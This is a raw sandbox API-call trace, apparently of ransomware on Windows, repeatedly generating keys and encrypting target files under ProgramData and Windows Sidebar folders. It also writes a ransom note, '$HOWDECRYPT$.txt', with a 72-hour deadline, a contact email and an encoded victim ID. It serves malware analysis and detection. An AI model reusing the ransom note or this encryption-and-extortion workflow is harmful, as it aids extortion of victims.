[0160.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c1a8 | out: hHeap=0x2c0000) returned 1 [0160.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea38 | out: pbBuffer=0x25cea38) returned 1 [0160.405] GetProcessHeap () returned 0x2c0000 [0160.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea30*=0x30) returned 1 [0160.405] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.405] GetProcessHeap () returned 0x2c0000 [0160.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.405] GetProcessHeap () returned 0x2c0000 [0160.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8c0b8 | out: hHeap=0x2c0000) returned 1 [0160.405] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea30 | out: pbBuffer=0x25cea30) returned 1 [0160.405] GetProcessHeap () returned 0x2c0000 [0160.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea28*=0x30) returned 1 [0160.405] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.405] GetProcessHeap () returned 0x2c0000 [0160.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bfc8 | out: hHeap=0x2c0000) returned 1 [0160.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea30 | out: pbBuffer=0x25cea30) returned 1 [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.406] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea28*=0x30) returned 1 [0160.406] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bed8 | out: hHeap=0x2c0000) returned 1 [0160.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea28 | out: pbBuffer=0x25cea28) returned 1 [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.406] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea20*=0x30) returned 1 [0160.406] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.406] GetProcessHeap () returned 0x2c0000 [0160.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bde8 | out: hHeap=0x2c0000) returned 1 [0160.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea28 | out: pbBuffer=0x25cea28) returned 1 [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea20*=0x30) returned 1 [0160.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bcf8 | out: hHeap=0x2c0000) returned 1 [0160.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea20 | out: pbBuffer=0x25cea20) returned 1 [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea18*=0x30) returned 1 [0160.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.407] GetProcessHeap () returned 0x2c0000 [0160.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bc08 | out: hHeap=0x2c0000) returned 1 [0160.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea20 | out: pbBuffer=0x25cea20) returned 1 [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea18*=0x30) returned 1 [0160.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8bb18 | out: hHeap=0x2c0000) returned 1 [0160.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea18 | out: pbBuffer=0x25cea18) returned 1 [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea10*=0x30) returned 1 [0160.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.408] GetProcessHeap () returned 0x2c0000 [0160.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.409] GetProcessHeap () returned 0x2c0000 [0160.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ba28 | out: hHeap=0x2c0000) returned 1 [0160.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea18 | out: pbBuffer=0x25cea18) returned 1 [0160.409] GetProcessHeap () returned 0x2c0000 [0160.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea10*=0x30) returned 1 [0160.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.409] GetProcessHeap () returned 0x2c0000 [0160.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.409] GetProcessHeap () returned 0x2c0000 [0160.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b938 | out: hHeap=0x2c0000) returned 1 [0160.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea10 | out: pbBuffer=0x25cea10) returned 1 [0160.409] GetProcessHeap () returned 0x2c0000 [0160.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea08*=0x30) returned 1 [0160.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.409] GetProcessHeap () returned 0x2c0000 [0160.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.410] GetProcessHeap () returned 0x2c0000 [0160.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b848 | out: hHeap=0x2c0000) returned 1 [0160.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea10 | out: pbBuffer=0x25cea10) returned 1 [0160.410] GetProcessHeap () returned 0x2c0000 [0160.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea08*=0x30) returned 1 [0160.410] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.410] GetProcessHeap () returned 0x2c0000 [0160.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.410] GetProcessHeap () returned 0x2c0000 [0160.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b758 | out: hHeap=0x2c0000) returned 1 [0160.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea08 | out: pbBuffer=0x25cea08) returned 1 [0160.410] GetProcessHeap () returned 0x2c0000 [0160.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea00*=0x30) returned 1 [0160.410] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.410] GetProcessHeap () returned 0x2c0000 [0160.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.411] GetProcessHeap () returned 0x2c0000 [0160.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b668 | out: hHeap=0x2c0000) returned 1 [0160.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea08 | out: pbBuffer=0x25cea08) returned 1 [0160.411] GetProcessHeap () returned 0x2c0000 [0160.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea00*=0x30) returned 1 [0160.411] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.411] GetProcessHeap () returned 0x2c0000 [0160.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.411] GetProcessHeap () returned 0x2c0000 [0160.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b578 | out: hHeap=0x2c0000) returned 1 [0160.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea00 | out: pbBuffer=0x25cea00) returned 1 [0160.411] GetProcessHeap () returned 0x2c0000 [0160.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce9f8*=0x30) returned 1 [0160.411] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.411] GetProcessHeap () returned 0x2c0000 [0160.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.412] GetProcessHeap () returned 0x2c0000 [0160.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b488 | out: hHeap=0x2c0000) returned 1 [0160.412] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea00 | out: pbBuffer=0x25cea00) returned 1 [0160.412] GetProcessHeap () returned 0x2c0000 [0160.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.500] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9f8*=0x30) returned 1 [0160.500] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.501] GetProcessHeap () returned 0x2c0000 [0160.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.501] GetProcessHeap () returned 0x2c0000 [0160.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8b398 | out: hHeap=0x2c0000) returned 1 [0160.501] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.604] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.604] WriteFile (in: hFile=0x178, lpBuffer=0x25ce92f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cea58, lpOverlapped=0x0 | out: lpBuffer=0x25ce92f*, lpNumberOfBytesWritten=0x25cea58*=0x127, lpOverlapped=0x0) returned 1 [0160.605] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.605] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cea58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cea58*=0x2ac, lpOverlapped=0x0) returned 1 [0160.605] CloseHandle (hObject=0x178) returned 1 [0160.605] GetProcessHeap () returned 0x2c0000 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44528 | out: hHeap=0x2c0000) returned 1 [0160.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9f8 | out: pbBuffer=0x25ce9f8) returned 1 [0160.605] GetProcessHeap () returned 0x2c0000 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9f0*=0x30) returned 1 [0160.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.605] GetProcessHeap () returned 0x2c0000 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.605] GetProcessHeap () returned 0x2c0000 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f42b10 | out: hHeap=0x2c0000) returned 1 [0160.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9f0 | out: pbBuffer=0x25ce9f0) returned 1 [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9e8*=0x30) returned 1 [0160.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40090 | out: hHeap=0x2c0000) returned 1 [0160.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9f0 | out: pbBuffer=0x25ce9f0) returned 1 [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9e8*=0x30) returned 1 [0160.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.606] GetProcessHeap () returned 0x2c0000 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f42a08 | out: hHeap=0x2c0000) returned 1 [0160.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9e8 | out: pbBuffer=0x25ce9e8) returned 1 [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9e0*=0x30) returned 1 [0160.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_foggy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ff78 | out: hHeap=0x2c0000) returned 1 [0160.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9e8 | out: pbBuffer=0x25ce9e8) returned 1 [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9e0*=0x30) returned 1 [0160.607] CreateFileW 